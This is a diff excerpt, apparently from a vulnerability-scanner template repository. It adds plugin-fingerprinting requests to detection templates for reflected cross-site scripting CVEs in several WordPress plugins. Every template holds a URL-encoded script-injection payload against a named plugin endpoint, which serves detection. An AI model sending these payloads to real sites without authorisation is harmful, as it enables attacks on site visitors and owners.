words:
|
||||||
|
- 'Church Admin ='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -27,7 +27,23 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project
|
tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'SourceAfrica'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
case-insensitive: true
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -31,7 +31,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/wp-symposium"
|
google-query: inurl:"/wp-content/plugins/wp-symposium"
|
||||||
tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
|
tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'WP Symposium'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -31,7 +31,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/admin-font-editor"
|
google-query: inurl:"/wp-content/plugins/admin-font-editor"
|
||||||
tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project
|
tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Admin Font Editor'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project
|
tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Ajax Random Post'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -27,7 +27,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/anti-plagiarism"
|
google-query: inurl:"/wp-content/plugins/anti-plagiarism"
|
||||||
tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project
|
tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'anti plagiarism'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
Loading…
Reference in New Issue